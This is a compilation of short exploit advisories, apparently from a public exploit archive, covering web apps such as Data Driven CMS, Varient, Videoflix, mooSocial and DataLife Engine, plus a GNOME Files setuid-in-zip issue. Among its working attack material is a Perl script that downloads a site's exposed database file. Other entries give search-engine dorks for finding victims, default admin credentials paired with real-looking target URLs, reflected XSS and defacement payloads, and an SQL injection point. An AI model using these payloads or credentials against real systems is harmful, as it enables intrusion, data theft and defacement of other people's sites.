<pre><code>====================================================================================================================================<br />| # Title : Data Driven CMS v0.4.1 database disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://codecanyon.net/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the database: <br /><br /> The following Perl exploit will attempt to download the (acart.mdb ) file<br /> The (acart.mdb) It is the database and contains all the data .<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br />#<br /># Asp Data Driven Website Database Exploit <br />#<br /># Author : indoushka<br />#<br /># Vondor : https://codecanyon.net/<br /> <br /> <br /> <br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print ('Asp Data Driven Website Database Exploit');<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[-]How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="acart.mdb";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/acart.mdb\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>Affected: GNOME Files 43.4 (nautilus) on fedora 37<br /><br />Description:<br /><br />If an user A opens in GNOME files zip archive containing<br />`setuid` file F, then F will be silently extracted to<br />a subdirectory of CWD.<br /><br />If F is accessible by hostile local user B and B executes F,<br />then F will be executed as from user A.<br /><br />tar(1) and unzip(1) are not vulnerable to this attack.<br /><br />Session for creating the ZIP.<br />After that just open f.zip in GNOME files.<br /><pre><br />[joro@fedora ~]$ umask<br />0022<br />[joro@fedora 2]$ mkdir /tmp/2 ; cd /tmp/2 ; echo hi > F ; chmod +xs F<br />[joro@fedora 2]$ zip f F ; zipinfo f<br />Archive: f.zip<br />Zip file size: 155 bytes, number of entries: 1<br />-rwsr-sr-x 3.0 unx 3 tx stor 23-Aug-05 12:38 F<br />[joro@fedora 2]$ ls -ld /tmp/2/<br />drwxr-xr-x. 2 joro joro 80 Aug 5 11:20 /tmp/2/<br />[joro@fedora 2]$<br /></pre><br /></code></pre>
<pre><code>======================================================================================================================================<br />| # Title : Varient News Magazine Script V2.2 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://varient.codingest.com/ | <br />| # Dork : "Varient - News Magazine - Varient" |<br />======================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Use Admin : admin@codingest.com & Pass : 1234<br /><br />[+] http://habergunuorg/admin<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>============================================================================<br />| # Title : video whisper conference v1.01 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : https://www.videowhisper.com/demos/conference/ | <br />| # Dork : "Video Conference by VideoWhisper.com" |<br />============================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] use payload : indoushka<acx><marquee><font color=lime size=32>indoushka</font></marquee><br /><br />[+] https://wwvideowhispercom/demos/conference/index.php?r=indoushka<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Videoflix Cms v1.3 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : https://codecanyon.net/item/videoflix-tv-series-movie-subscription-portal-cms/20839016 | <br />| # Dork : "Made with by Vmax-Studio." |<br />====================================================================================================================================<br /><br />poc : <br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Users : login email : admin@videoflix.com, password : abcdefg <br /><br />[+] http://arabflixcom/index.php?admin/dashboard<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code># Exploit Title: Social-Commerce 3.1.6 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 28/07/2023<br /># Vendor: mooSocial<br /># Vendor Homepage: https://moosocial.com/<br /># Software Link: https://social-commerce.moosocial.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4174<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br />Path: /search/index<br /><br />GET parameter 'q' is vulnerable to XSS<br /><br />https://website/search/index?q=[XSS]<br /><br /><br />URL path folder [1,2] is vulnerable to XSS<br /><br />https://website/stores[XSS]/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent<br /><br />https://website/user_info[XSS]/index/friends<br /><br />https://website/user_info/index[XSS]/friends<br /><br />https://website/faqs[XSS]/index?content_search=<br /><br />https://website/faqs/index[XSS]?content_search=<br /><br /><br /><br />XSS Payloads:<br /><br />j8chn"><img src=a onerror=alert(1)>ridxm<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: mooSocial 3.1.8 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 28/07/2023<br /># Vendor: mooSocial<br /># Vendor Homepage: https://moosocial.com/<br /># Software Link: https://travel.moosocial.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4173<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />URL path folder is vulnerable to XSS<br /><br />https://website/classifieds[XSS]/search?category=1<br /><br />https://website/classifieds/search[XSS]?category=1<br /><br /><br />XSS Payloads:<br /><br />ijz3y"><img src=a onerror=alert(1)>y4apk<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure<br /># Exploit Author: CraCkEr<br /># Date: 25/07/2023<br /># Vendor: Templatecookie<br /># Vendor Homepage: https://templatecookie.com/<br /># Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script<br /># Tested on: Windows 10 Pro<br /># Impact: Sensitive Information Leakage<br /># CVE: CVE-2023-4168<br /><br /><br />## Description<br /><br />Information disclosure issue in the redirect responses, When accessing any page on the website,<br />Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.<br /><br /><br />## Steps to Reproduce:<br /><br />When you visit any page on the website, like:<br /><br />https://website/ad-list?category=electronics<br />https://website/ad-list-search?page=2<br />https://website/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=<br /><br />in the body page response there's information leakage for<br /> <br />+---------------------+<br />google_map_key<br />api_key<br />auth_domain<br />project_id<br />storage_bucket<br />messaging_sender_id<br />app_id<br />measurement_id<br />+---------------------+<br /><br /><br />Note: The same information leaked, such as the API keys, server keys, and app ID, was added to the "Firebase Push Notification Configuration" in the Administration Panel.<br /><br />Settings of "Firebase Push Notification Configuration" in the Administration Panel, on this Path:<br /><br />https://website/push-notification (Login as Administrator)<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Datalife Engine v10 (ir) SQl injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://datalifeengine.ir/ |<br />| # Dork : Powered by DataLife Engine © 2013 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use Pyaload : /index.php?newsid=100 (inject her)<br /><br />[+] cpanl : http://127.0.0.1/datalifeengine/admin.php <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Database compilation CMS v1.2 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.2(32-bit) | <br />| # Vendor : http://mcastel.weebly.com/ | <br />| # Dork : "Database compilation by Marco Castellani( INAF - Astronomical Observatory of Rome)" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /table1a.php?sel=<script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/table1a.php?sel=%3Cscript%3Ealert(/indoushka/);%3C/script%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>